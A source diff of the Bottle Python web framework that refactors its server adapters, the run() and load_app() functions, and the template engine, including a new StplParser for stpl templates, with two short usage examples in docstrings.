Fapws3.\n") _stderr(" (Fapws3 breaks python thread support)\n") evwsgi.set_base_module(base) + def app(environ, start_response): environ['wsgi.multiprocess'] = False return handler(environ, start_response) + evwsgi.wsgi_cb(('', app)) evwsgi.run() class TornadoServer(ServerAdapter): """ The super hyped asynchronous server by facebook. Untested. 
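Extra keyword arguments passed to run() are forwarded to the selected adapter as options; for example, the CherryPy adapter above now picks up certfile/keyfile to enable SSL. A sketch (the certificate paths are placeholders):

    from bottle import Bottle, run

    app = Bottle()

    @app.get('/')
    def index():
        return 'served by CherryPy over HTTPS'

    if __name__ == '__main__':
        run(app, server='cherrypy', host='0.0.0.0', port=8443,
            certfile='/path/to/server.crt', keyfile='/path/to/server.key')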
""" - def run(self, handler): # pragma: no cover + + def run(self, handler): # pragma: no cover import tornado.wsgi, tornado.httpserver, tornado.ioloop container = tornado.wsgi.WSGIContainer(handler) server = tornado.httpserver.HTTPServer(container) - server.listen(port=self.port) + server.listen(port=self.port, address=self.host) tornado.ioloop.IOLoop.instance().start() class AppEngineServer(ServerAdapter): """ Adapter for Google App Engine. """ quiet = True + def run(self, handler): from google.appengine.ext.webapp import util # A main() function in the handler script enables 'App Caching'. @@ -2470,6 +3008,7 @@ class AppEngineServer(ServerAdapter): class TwistedServer(ServerAdapter): """ Untested. """ + def run(self, handler): from twisted.web import server, wsgi from twisted.python.threadpool import ThreadPool @@ -2479,11 +3018,13 @@ class TwistedServer(ServerAdapter): reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop) factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler)) reactor.listenTCP(self.port, factory, interface=self.host) - reactor.run() + if not reactor.running: + reactor.run() class DieselServer(ServerAdapter): """ Untested. """ + def run(self, handler): from diesel.protocols.wsgi import WSGIApplication app = WSGIApplication(handler, port=self.port) @@ -2495,19 +3036,34 @@ class GeventServer(ServerAdapter): * `fast` (default: False) uses libevent's http server, but has some issues: No streaming, no pipelining, no SSL. + * See gevent.wsgi.WSGIServer() documentation for more options. """ + def run(self, handler): from gevent import wsgi, pywsgi, local - if not isinstance(_lctx, local.local): + if not isinstance(threading.local(), local.local): msg = "Bottle requires gevent.monkey.patch_all() (before import)" raise RuntimeError(msg) - if not self.options.get('fast'): wsgi = pywsgi - log = None if self.quiet else 'default' - wsgi.WSGIServer((self.host, self.port), handler, log=log).serve_forever() + if not self.options.pop('fast', None): wsgi = pywsgi + self.options['log'] = None if self.quiet else 'default' + address = (self.host, self.port) + server = wsgi.WSGIServer(address, handler, **self.options) + if 'BOTTLE_CHILD' in os.environ: + import signal + signal.signal(signal.SIGINT, lambda s, f: server.stop()) + server.serve_forever() + + +class GeventSocketIOServer(ServerAdapter): + def run(self, handler): + from socketio import server + address = (self.host, self.port) + server.SocketIOServer(address, handler, **self.options).serve_forever() class GunicornServer(ServerAdapter): """ Untested. See http://gunicorn.org/configure.html for options. """ + def run(self, handler): from gunicorn.app.base import Application @@ -2525,35 +3081,87 @@ class GunicornServer(ServerAdapter): class EventletServer(ServerAdapter): - """ Untested """ + """ Untested. Options: + + * `backlog` adjust the eventlet backlog parameter which is the maximum + number of queued connections. Should be at least 1; the maximum + value is system-dependent. + * `family`: (default is 2) socket family, optional. See socket + documentation for available families. 
+ """ + def run(self, handler): - from eventlet import wsgi, listen + from eventlet import wsgi, listen, patcher + if not patcher.is_monkey_patched(os): + msg = "Bottle requires eventlet.monkey_patch() (before import)" + raise RuntimeError(msg) + socket_args = {} + for arg in ('backlog', 'family'): + try: + socket_args[arg] = self.options.pop(arg) + except KeyError: + pass + address = (self.host, self.port) try: - wsgi.server(listen((self.host, self.port)), handler, + wsgi.server(listen(address, **socket_args), handler, log_output=(not self.quiet)) except TypeError: # Fallback, if we have old version of eventlet - wsgi.server(listen((self.host, self.port)), handler) + wsgi.server(listen(address), handler) class RocketServer(ServerAdapter): """ Untested. """ + def run(self, handler): from rocket import Rocket - server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler }) + server = Rocket((self.host, self.port), 'wsgi', {'wsgi_app': handler}) server.start() class BjoernServer(ServerAdapter): """ Fast server written in C: https://github.com/jonashaag/bjoern """ + def run(self, handler): from bjoern import run run(handler, self.host, self.port) +class AiohttpServer(ServerAdapter): + """ Untested. + aiohttp + https://pypi.python.org/pypi/aiohttp/ + """ + + def run(self, handler): + import asyncio + from aiohttp.wsgi import WSGIServerHttpProtocol + self.loop = asyncio.new_event_loop() + asyncio.set_event_loop(self.loop) + + protocol_factory = lambda: WSGIServerHttpProtocol( + handler, + readpayload=True, + debug=(not self.quiet)) + self.loop.run_until_complete(self.loop.create_server(protocol_factory, + self.host, + self.port)) + + if 'BOTTLE_CHILD' in os.environ: + import signal + signal.signal(signal.SIGINT, lambda s, f: self.loop.stop()) + + try: + self.loop.run_forever() + except KeyboardInterrupt: + self.loop.stop() + + class AutoServer(ServerAdapter): """ Untested. """ - adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer] + adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, + WSGIRefServer] + def run(self, handler): for sa in self.adapters: try: @@ -2561,6 +3169,7 @@ class AutoServer(ServerAdapter): except ImportError: pass + server_names = { 'cgi': CGIServer, 'flup': FlupFCGIServer, @@ -2577,16 +3186,13 @@ server_names = { 'gunicorn': GunicornServer, 'eventlet': EventletServer, 'gevent': GeventServer, + 'geventSocketIO': GeventSocketIOServer, 'rocket': RocketServer, - 'bjoern' : BjoernServer, + 'bjoern': BjoernServer, + 'aiohttp': AiohttpServer, 'auto': AutoServer, } - - - - - ############################################################################### # Application Control ########################################################## ############################################################################### @@ -2616,19 +3222,30 @@ def load_app(target): """ Load a bottle application from a module and make sure that the import does not affect the current default application, but returns a separate application object. See :func:`load` for the target parameter. 
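For illustration, assuming a module mypackage.web that defines a module-level Bottle instance named app (both names are made up):

    from bottle import load_app, run

    # import mypackage.web and return its module-level 'app' object
    application = load_app('mypackage.web:app')

    if __name__ == '__main__':
        # run() accepts the same target string and calls load_app() itself
        run('mypackage.web:app', host='127.0.0.1', port=8080)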
""" - global NORUN; NORUN, nr_old = True, NORUN + global NORUN + NORUN, nr_old = True, NORUN + tmp = default_app.push() # Create a new "default application" try: - tmp = default_app.push() # Create a new "default application" - rv = load(target) # Import the target module + rv = load(target) # Import the target module return rv if callable(rv) else tmp finally: - default_app.remove(tmp) # Remove the temporary added default application + default_app.remove(tmp) # Remove the temporary added default application NORUN = nr_old + _debug = debug -def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, - interval=1, reloader=False, quiet=False, plugins=None, - debug=False, **kargs): + + +def run(app=None, + server='wsgiref', + host='127.0.0.1', + port=8080, + interval=1, + reloader=False, + quiet=False, + plugins=None, + debug=None, + config=None, **kargs): """ Start a server instance. This method blocks until the server terminates. :param app: WSGI application or target string supported by @@ -2647,18 +3264,19 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, """ if NORUN: return if reloader and not os.environ.get('BOTTLE_CHILD'): + import subprocess + lockfile = None try: - lockfile = None fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock') - os.close(fd) # We only need this file to exist. We never write to it + os.close(fd) # We only need this file to exist. We never write to it while os.path.exists(lockfile): args = [sys.executable] + sys.argv environ = os.environ.copy() environ['BOTTLE_CHILD'] = 'true' environ['BOTTLE_LOCKFILE'] = lockfile p = subprocess.Popen(args, env=environ) - while p.poll() is None: # Busy wait... - os.utime(lockfile, None) # I am alive! + while p.poll() is None: # Busy wait... + os.utime(lockfile, None) # I am alive! time.sleep(interval) if p.poll() != 3: if os.path.exists(lockfile): os.unlink(lockfile) @@ -2671,7 +3289,7 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, return try: - _debug(debug) + if debug is not None: _debug(debug) app = app or default_app() if isinstance(app, basestring): app = load_app(app) @@ -2679,8 +3297,13 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, raise ValueError("Application is not callable: %r" % app) for plugin in plugins or []: + if isinstance(plugin, basestring): + plugin = load(plugin) app.install(plugin) + if config: + app.config.update(config) + if server in server_names: server = server_names.get(server) if isinstance(server, basestring): @@ -2692,8 +3315,10 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, server.quiet = server.quiet or quiet if not server.quiet: - _stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server))) - _stderr("Listening on http://%s:%d/\n" % (server.host, server.port)) + _stderr("Bottle v%s server starting up (using %s)...\n" % + (__version__, repr(server))) + _stderr("Listening on http://%s:%d/\n" % + (server.host, server.port)) _stderr("Hit Ctrl-C to quit.\n\n") if reloader: @@ -2717,20 +3342,20 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, sys.exit(3) - class FileCheckerThread(threading.Thread): - ''' Interrupt main-thread as soon as a changed module file is detected, - the lockfile gets deleted or gets to old. ''' + """ Interrupt main-thread as soon as a changed module file is detected, + the lockfile gets deleted or gets to old. 
""" def __init__(self, lockfile, interval): threading.Thread.__init__(self) + self.daemon = True self.lockfile, self.interval = lockfile, interval #: Is one of 'reload', 'error' or 'exit' self.status = None def run(self): exists = os.path.exists - mtime = lambda path: os.stat(path).st_mtime + mtime = lambda p: os.stat(p).st_mtime files = dict() for module in list(sys.modules.values()): @@ -2753,15 +3378,11 @@ class FileCheckerThread(threading.Thread): def __enter__(self): self.start() - def __exit__(self, exc_type, exc_val, exc_tb): - if not self.status: self.status = 'exit' # silent exit + def __exit__(self, exc_type, *_): + if not self.status: self.status = 'exit' # silent exit self.join() return exc_type is not None and issubclass(exc_type, KeyboardInterrupt) - - - - ############################################################################### # Template Adapters ############################################################ ############################################################################### @@ -2774,11 +3395,15 @@ class TemplateError(HTTPError): class BaseTemplate(object): """ Base class and minimal API for template adapters """ - extensions = ['tpl','html','thtml','stpl'] - settings = {} #used in prepare() - defaults = {} #used in render() + extensions = ['tpl', 'html', 'thtml', 'stpl'] + settings = {} #used in prepare() + defaults = {} #used in render() - def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **settings): + def __init__(self, + source=None, + name=None, + lookup=None, + encoding='utf8', **settings): """ Create a new template. If the source parameter (str or buffer) is missing, the name argument is used to guess a template filename. Subclasses can assume that @@ -2792,10 +3417,10 @@ class BaseTemplate(object): self.name = name self.source = source.read() if hasattr(source, 'read') else source self.filename = source.filename if hasattr(source, 'filename') else None - self.lookup = [os.path.abspath(x) for x in lookup] + self.lookup = [os.path.abspath(x) for x in lookup] if lookup else [] self.encoding = encoding - self.settings = self.settings.copy() # Copy from class variable - self.settings.update(settings) # Apply + self.settings = self.settings.copy() # Copy from class variable + self.settings.update(settings) # Apply if not self.source and self.name: self.filename = self.search(self.name, self.lookup) if not self.filename: @@ -2805,15 +3430,16 @@ class BaseTemplate(object): self.prepare(**self.settings) @classmethod - def search(cls, name, lookup=[]): + def search(cls, name, lookup=None): """ Search name in all directories specified in lookup. First without, then with common extensions. Return first hit. """ if not lookup: - depr('The template lookup path list should not be empty.') + depr('The template lookup path list should not be empty.', + True) #0.12 lookup = ['.'] if os.path.isabs(name) and os.path.isfile(name): - depr('Absolute template path names are deprecated.') + depr('Absolute template path names are deprecated.', True) #0.12 return os.path.abspath(name) for spath in lookup: @@ -2827,9 +3453,9 @@ class BaseTemplate(object): @classmethod def global_config(cls, key, *args): - ''' This reads or sets the global settings stored in class.settings. ''' + """ This reads or sets the global settings stored in class.settings. 
""" if args: - cls.settings = cls.settings.copy() # Make settings local to class + cls.settings = cls.settings.copy() # Make settings local to class cls.settings[key] = args[0] else: return cls.settings[key] @@ -2845,8 +3471,8 @@ class BaseTemplate(object): """ Render the template with the specified local variables and return a single byte or unicode string. If it is a byte string, the encoding must match self.encoding. This method must be thread-safe! - Local variables may be provided in dictionaries (*args) - or directly, as keywords (**kwargs). + Local variables may be provided in dictionaries (args) + or directly, as keywords (kwargs). """ raise NotImplementedError @@ -2855,16 +3481,19 @@ class MakoTemplate(BaseTemplate): def prepare(self, **options): from mako.template import Template from mako.lookup import TemplateLookup - options.update({'input_encoding':self.encoding}) + options.update({'input_encoding': self.encoding}) options.setdefault('format_exceptions', bool(DEBUG)) lookup = TemplateLookup(directories=self.lookup, **options) if self.source: self.tpl = Template(self.source, lookup=lookup, **options) else: - self.tpl = Template(uri=self.name, filename=self.filename, lookup=lookup, **options) + self.tpl = Template(uri=self.name, + filename=self.filename, + lookup=lookup, **options) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) _defaults = self.defaults.copy() _defaults.update(kwargs) return self.tpl.render(**_defaults) @@ -2882,7 +3511,8 @@ class CheetahTemplate(BaseTemplate): self.tpl = Template(file=self.filename, **options) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) self.context.vars.update(self.defaults) self.context.vars.update(kwargs) out = str(self.tpl) @@ -2891,21 +3521,20 @@ class CheetahTemplate(BaseTemplate): class Jinja2Template(BaseTemplate): - def prepare(self, filters=None, tests=None, **kwargs): + def prepare(self, filters=None, tests=None, globals={}, **kwargs): from jinja2 import Environment, FunctionLoader - if 'prefix' in kwargs: # TODO: to be removed after a while - raise RuntimeError('The keyword argument `prefix` has been removed. ' - 'Use the full jinja2 environment name line_statement_prefix instead.') self.env = Environment(loader=FunctionLoader(self.loader), **kwargs) if filters: self.env.filters.update(filters) if tests: self.env.tests.update(tests) + if globals: self.env.globals.update(globals) if self.source: self.tpl = self.env.from_string(self.source) else: self.tpl = self.env.get_template(self.filename) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) _defaults = self.defaults.copy() _defaults.update(kwargs) return self.tpl.render(**_defaults) @@ -2917,191 +3546,277 @@ class Jinja2Template(BaseTemplate): return f.read().decode(self.encoding) -class SimpleTALTemplate(BaseTemplate): - ''' Deprecated, do not use. 
''' - def prepare(self, **options): - depr('The SimpleTAL template handler is deprecated'\ - ' and will be removed in 0.12') - from simpletal import simpleTAL - if self.source: - self.tpl = simpleTAL.compileHTMLTemplate(self.source) - else: - with open(self.filename, 'rb') as fp: - self.tpl = simpleTAL.compileHTMLTemplate(tonat(fp.read())) - - def render(self, *args, **kwargs): - from simpletal import simpleTALES - for dictarg in args: kwargs.update(dictarg) - context = simpleTALES.Context() - for k,v in self.defaults.items(): - context.addGlobal(k, v) - for k,v in kwargs.items(): - context.addGlobal(k, v) - output = StringIO() - self.tpl.expand(context, output) - return output.getvalue() - - class SimpleTemplate(BaseTemplate): - blocks = ('if', 'elif', 'else', 'try', 'except', 'finally', 'for', 'while', - 'with', 'def', 'class') - dedent_blocks = ('elif', 'else', 'except', 'finally') - - @lazy_attribute - def re_pytokens(cls): - ''' This matches comments and all kinds of quoted strings but does - NOT match comments (#...) within quoted strings. (trust me) ''' - return re.compile(r''' - (''(?!')|""(?!")|'{6}|"{6} # Empty strings (all 4 types) - |'(?:[^\\']|\\.)+?' # Single quotes (') - |"(?:[^\\"]|\\.)+?" # Double quotes (") - |'{3}(?:[^\\]|\\.|\n)+?'{3} # Triple-quoted strings (') - |"{3}(?:[^\\]|\\.|\n)+?"{3} # Triple-quoted strings (") - |\#.* # Comments - )''', re.VERBOSE) - - def prepare(self, escape_func=html_escape, noescape=False, **kwargs): + def prepare(self, + escape_func=html_escape, + noescape=False, + syntax=None, **ka): self.cache = {} enc = self.encoding self._str = lambda x: touni(x, enc) self._escape = lambda x: escape_func(touni(x, enc)) + self.syntax = syntax if noescape: self._str, self._escape = self._escape, self._str - @classmethod - def split_comment(cls, code): - """ Removes comments (#...) from python code. 
""" - if '#' not in code: return code - #: Remove comments only (leave quoted strings as they are) - subf = lambda m: '' if m.group(0)[0]=='#' else m.group(0) - return re.sub(cls.re_pytokens, subf, code) - @cached_property def co(self): return compile(self.code, self.filename or '<string>', 'exec') @cached_property def code(self): - stack = [] # Current Code indentation - lineno = 0 # Current line of code - ptrbuffer = [] # Buffer for printable strings and token tuple instances - codebuffer = [] # Buffer for generated python code - multiline = dedent = oneline = False - template = self.source or open(self.filename, 'rb').read() + source = self.source + if not source: + with open(self.filename, 'rb') as f: + source = f.read() + try: + source, encoding = touni(source), 'utf8' + except UnicodeError: + depr('Template encodings other than utf8 are not supported.') #0.11 + source, encoding = touni(source, 'latin1'), 'latin1' + parser = StplParser(source, encoding=encoding, syntax=self.syntax) + code = parser.translate() + self.encoding = parser.encoding + return code - def yield_tokens(line): - for i, part in enumerate(re.split(r'\{\{(.*?)\}\}', line)): - if i % 2: - if part.startswith('!'): yield 'RAW', part[1:] - else: yield 'CMD', part - else: yield 'TXT', part + def _rebase(self, _env, _name=None, **kwargs): + _env['_rebase'] = (_name, kwargs) - def flush(): # Flush the ptrbuffer - if not ptrbuffer: return - cline = '' - for line in ptrbuffer: - for token, value in line: - if token == 'TXT': cline += repr(value) - elif token == 'RAW': cline += '_str(%s)' % value - elif token == 'CMD': cline += '_escape(%s)' % value - cline += ', ' - cline = cline[:-2] + '\\\n' - cline = cline[:-2] - if cline[:-1].endswith('\\\\\\\\\\n'): - cline = cline[:-7] + cline[-1] # 'nobr\\\\\n' --> 'nobr' - cline = '_printlist([' + cline + '])' - del ptrbuffer[:] # Do this before calling code() again - code(cline) - - def code(stmt): - for line in stmt.splitlines(): - codebuffer.append(' ' * len(stack) + line.strip()) - - for line in template.splitlines(True): - lineno += 1 - line = touni(line, self.encoding) - sline = line.lstrip() - if lineno <= 2: - m = re.match(r"%\s*#.*coding[:=]\s*([-\w.]+)", sline) - if m: self.encoding = m.group(1) - if m: line = line.replace('coding','coding (removed)') - if sline and sline[0] == '%' and sline[:2] != '%%': - line = line.split('%',1)[1].lstrip() # Full line following the % - cline = self.split_comment(line).strip() - cmd = re.split(r'[^a-zA-Z0-9_]', cline)[0] - flush() # You are actually reading this? 
Good luck, it's a mess :) - if cmd in self.blocks or multiline: - cmd = multiline or cmd - dedent = cmd in self.dedent_blocks # "else:" - if dedent and not oneline and not multiline: - cmd = stack.pop() - code(line) - oneline = not cline.endswith(':') # "if 1: pass" - multiline = cmd if cline.endswith('\\') else False - if not oneline and not multiline: - stack.append(cmd) - elif cmd == 'end' and stack: - code('#end(%s) %s' % (stack.pop(), line.strip()[3:])) - elif cmd == 'include': - p = cline.split(None, 2)[1:] - if len(p) == 2: - code("_=_include(%s, _stdout, %s)" % (repr(p[0]), p[1])) - elif p: - code("_=_include(%s, _stdout)" % repr(p[0])) - else: # Empty %include -> reverse of %rebase - code("_printlist(_base)") - elif cmd == 'rebase': - p = cline.split(None, 2)[1:] - if len(p) == 2: - code("globals()['_rebase']=(%s, dict(%s))" % (repr(p[0]), p[1])) - elif p: - code("globals()['_rebase']=(%s, {})" % repr(p[0])) - else: - code(line) - else: # Line starting with text (not '%') or '%%' (escaped) - if line.strip().startswith('%%'): - line = line.replace('%%', '%', 1) - ptrbuffer.append(yield_tokens(line)) - flush() - return '\n'.join(codebuffer) + '\n' - - def subtemplate(self, _name, _stdout, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + def _include(self, _env, _name=None, **kwargs): + env = _env.copy() + env.update(kwargs) if _name not in self.cache: self.cache[_name] = self.__class__(name=_name, lookup=self.lookup) - return self.cache[_name].execute(_stdout, kwargs) + return self.cache[_name].execute(env['_stdout'], env) - def execute(self, _stdout, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + def execute(self, _stdout, kwargs): env = self.defaults.copy() - env.update({'_stdout': _stdout, '_printlist': _stdout.extend, - '_include': self.subtemplate, '_str': self._str, - '_escape': self._escape, 'get': env.get, - 'setdefault': env.setdefault, 'defined': env.__contains__}) env.update(kwargs) + env.update({ + '_stdout': _stdout, + '_printlist': _stdout.extend, + 'include': functools.partial(self._include, env), + 'rebase': functools.partial(self._rebase, env), + '_rebase': None, + '_str': self._str, + '_escape': self._escape, + 'get': env.get, + 'setdefault': env.setdefault, + 'defined': env.__contains__ + }) eval(self.co, env) - if '_rebase' in env: - subtpl, rargs = env['_rebase'] - rargs['_base'] = _stdout[:] #copy stdout - del _stdout[:] # clear stdout - return self.subtemplate(subtpl,_stdout,rargs) + if env.get('_rebase'): + subtpl, rargs = env.pop('_rebase') + rargs['base'] = ''.join(_stdout) #copy stdout + del _stdout[:] # clear stdout + return self._include(env, subtpl, **rargs) return env def render(self, *args, **kwargs): """ Render the template using keyword arguments as local variables. """ - for dictarg in args: kwargs.update(dictarg) + env = {} stdout = [] - self.execute(stdout, kwargs) + for dictarg in args: + env.update(dictarg) + env.update(kwargs) + self.execute(stdout, env) return ''.join(stdout) -def template(*args, **kwargs): +class StplSyntaxError(TemplateError): + + pass + + +class StplParser(object): + """ Parser for stpl templates. """ + _re_cache = {} #: Cache for compiled re patterns + + # This huge pile of voodoo magic splits python code into 8 different tokens. + # We use the verbose (?x) regex mode to make this more manageable + + _re_tok = _re_inl = r'''((?mx) # verbose and dot-matches-newline mode + [urbURB]* + (?: ''(?!') + |""(?!") + |'{6} + |"{6} + |'(?:[^\\']|\\.)+?' + |"(?:[^\\"]|\\.)+?" 
+ |'{3}(?:[^\\]|\\.|\n)+?'{3} + |"{3}(?:[^\\]|\\.|\n)+?"{3} + ) + )''' + + _re_inl = _re_tok.replace(r'|\n', '') # We re-use this string pattern later + + _re_tok += r''' + # 2: Comments (until end of line, but not the newline itself) + |(\#.*) + + # 3: Open and close (4) grouping tokens + |([\[\{\(]) + |([\]\}\)]) + + # 5,6: Keywords that start or continue a python block (only start of line) + |^([\ \t]*(?:if|for|while|with|try|def|class)\b) + |^([\ \t]*(?:elif|else|except|finally)\b) + + # 7: Our special 'end' keyword (but only if it stands alone) + |((?:^|;)[\ \t]*end[\ \t]*(?=(?:%(block_close)s[\ \t]*)?\r?$|;|\#)) + + # 8: A customizable end-of-code-block template token (only end of line) + |(%(block_close)s[\ \t]*(?=\r?$)) + + # 9: And finally, a single newline. The 10th token is 'everything else' + |(\r?\n) ''' + + # Match the start tokens of code areas in a template + _re_split = r'''(?m)^[ \t]*(\\?)((%(line_start)s)|(%(block_start)s))''' + # Match inline statements (may contain python strings) + _re_inl = r'''%%(inline_start)s((?:%s|[^'"\n]+?)*?)%%(inline_end)s''' % _re_inl + + default_syntax = '<% %> % {{ }}' + + def __init__(self, source, syntax=None, encoding='utf8'): + self.source, self.encoding = touni(source, encoding), encoding + self.set_syntax(syntax or self.default_syntax) + self.code_buffer, self.text_buffer = [], [] + self.lineno, self.offset = 1, 0 + self.indent, self.indent_mod = 0, 0 + self.paren_depth = 0 + + def get_syntax(self): + """ Tokens as a space separated string (default: <% %> % {{ }}) """ + return self._syntax + + def set_syntax(self, syntax): + self._syntax = syntax + self._tokens = syntax.split() + if not syntax in self._re_cache: + names = 'block_start block_close line_start inline_start inline_end' + etokens = map(re.escape, self._tokens) + pattern_vars = dict(zip(names.split(), etokens)) + patterns = (self._re_split, self._re_tok, self._re_inl) + patterns = [re.compile(p % pattern_vars) for p in patterns] + self._re_cache[syntax] = patterns + self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax] + + syntax = property(get_syntax, set_syntax) + + def translate(self): + if self.offset: raise RuntimeError('Parser is a one time instance.') + while True: + m = self.re_split.search(self.source, pos=self.offset) + if m: + text = self.source[self.offset:m.start()] + self.text_buffer.append(text) + self.offset = m.end() + if m.group(1): # Escape syntax + line, sep, _ = self.source[self.offset:].partition('\n') + self.text_buffer.append(self.source[m.start():m.start(1)] + + m.group(2) + line + sep) + self.offset += len(line + sep) + continue + self.flush_text() + self.offset += self.read_code(self.source[self.offset:], + multiline=bool(m.group(4))) + else: + break + self.text_buffer.append(self.source[self.offset:]) + self.flush_text() + return ''.join(self.code_buffer) + + def read_code(self, pysource, multiline): + code_line, comment = '', '' + offset = 0 + while True: + m = self.re_tok.search(pysource, pos=offset) + if not m: + code_line += pysource[offset:] + offset = len(pysource) + self.write_code(code_line.strip(), comment) + break + code_line += pysource[offset:m.start()] + offset = m.end() + _str, _com, _po, _pc, _blk1, _blk2, _end, _cend, _nl = m.groups() + if self.paren_depth > 0 and (_blk1 or _blk2): # a if b else c + code_line += _blk1 or _blk2 + continue + if _str: # Python string + code_line += _str + elif _com: # Python comment (up to EOL) + comment = _com + if multiline and _com.strip().endswith(self._tokens[1]): + multiline = False 
# Allow end-of-block in comments + elif _po: # open parenthesis + self.paren_depth += 1 + code_line += _po + elif _pc: # close parenthesis + if self.paren_depth > 0: + # we could check for matching parentheses here, but it's + # easier to leave that to python - just check counts + self.paren_depth -= 1 + code_line += _pc + elif _blk1: # Start-block keyword (if/for/while/def/try/...) + code_line, self.indent_mod = _blk1, -1 + self.indent += 1 + elif _blk2: # Continue-block keyword (else/elif/except/...) + code_line, self.indent_mod = _blk2, -1 + elif _end: # The non-standard 'end'-keyword (ends a block) + self.indent -= 1 + elif _cend: # The end-code-block template token (usually '%>') + if multiline: multiline = False + else: code_line += _cend + else: # \n + self.write_code(code_line.strip(), comment) + self.lineno += 1 + code_line, comment, self.indent_mod = '', '', 0 + if not multiline: + break + + return offset + + def flush_text(self): + text = ''.join(self.text_buffer) + del self.text_buffer[:] + if not text: return + parts, pos, nl = [], 0, '\\\n' + ' ' * self.indent + for m in self.re_inl.finditer(text): + prefix, pos = text[pos:m.start()], m.end() + if prefix: + parts.append(nl.join(map(repr, prefix.splitlines(True)))) + if prefix.endswith('\n'): parts[-1] += nl + parts.append(self.process_inline(m.group(1).strip())) + if pos < len(text): + prefix = text[pos:] + lines = prefix.splitlines(True) + if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3] + elif lines[-1].endswith('\\\\\r\n'): lines[-1] = lines[-1][:-4] + parts.append(nl.join(map(repr, lines))) + code = '_printlist((%s,))' % ', '.join(parts) + self.lineno += code.count('\n') + 1 + self.write_code(code) + + @staticmethod + def process_inline(chunk): + if chunk[0] == '!': return '_str(%s)' % chunk[1:] + return '_escape(%s)' % chunk + + def write_code(self, line, comment=''): + code = ' ' * (self.indent + self.indent_mod) + code += line.lstrip() + comment + '\n' + self.code_buffer.append(code) + + +def template(*args, **kwargs): + """ Get a rendered template as a string iterator. You can use a name, a filename or a template string as first parameter. Template rendering arguments can be passed as dictionaries or directly (as keyword arguments). - ''' + """ tpl = args[0] if args else None adapter = kwargs.pop('template_adapter', SimpleTemplate) lookup = kwargs.pop('template_lookup', TEMPLATE_PATH) @@ -3117,17 +3832,19 @@ def template(*args, **kwargs): TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings) if not TEMPLATES[tplid]: abort(500, 'Template (%s) not found' % tpl) - for dictarg in args[1:]: kwargs.update(dictarg) + for dictarg in args[1:]: + kwargs.update(dictarg) return TEMPLATES[tplid].render(kwargs) + mako_template = functools.partial(template, template_adapter=MakoTemplate) -cheetah_template = functools.partial(template, template_adapter=CheetahTemplate) +cheetah_template = functools.partial(template, + template_adapter=CheetahTemplate) jinja2_template = functools.partial(template, template_adapter=Jinja2Template) -simpletal_template = functools.partial(template, template_adapter=SimpleTALTemplate) def view(tpl_name, **defaults): - ''' Decorator: renders a template for a handler. + """ Decorator: renders a template for a handler. The handler can control its behavior like that: - return a dict of template vars to fill out the template @@ -3135,8 +3852,10 @@ def view(tpl_name, **defaults): process the template, but return the handler result as is. 
This includes returning a HTTPResponse(dict) to get, for instance, JSON with autojson or other castfilters. - ''' + """ + def decorator(func): + @functools.wraps(func) def wrapper(*args, **kwargs): result = func(*args, **kwargs) @@ -3147,48 +3866,45 @@ def view(tpl_name, **defaults): elif result is None: return template(tpl_name, defaults) return result + return wrapper + return decorator + mako_view = functools.partial(view, template_adapter=MakoTemplate) cheetah_view = functools.partial(view, template_adapter=CheetahTemplate) jinja2_view = functools.partial(view, template_adapter=Jinja2Template) -simpletal_view = functools.partial(view, template_adapter=SimpleTALTemplate) - - - - - ############################################################################### # Constants and Globals ######################################################## ############################################################################### - TEMPLATE_PATH = ['./', './views/'] TEMPLATES = {} DEBUG = False -NORUN = False # If set, run() does nothing. Used by load_app() +NORUN = False # If set, run() does nothing. Used by load_app() #: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found') -HTTP_CODES = httplib.responses -HTTP_CODES[418] = "I'm a teapot" # RFC 2324 +HTTP_CODES = httplib.responses.copy() +HTTP_CODES[418] = "I'm a teapot" # RFC 2324 HTTP_CODES[428] = "Precondition Required" HTTP_CODES[429] = "Too Many Requests" HTTP_CODES[431] = "Request Header Fields Too Large" HTTP_CODES[511] = "Network Authentication Required" -_HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items()) +_HTTP_STATUS_LINES = dict((k, '%d %s' % (k, v)) + for (k, v) in HTTP_CODES.items()) #: The default template used for error pages. Override with @error() ERROR_PAGE_TEMPLATE = """ %%try: - %%from %s import DEBUG, HTTP_CODES, request, touni + %%from %s import DEBUG, request <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: {{e.status}}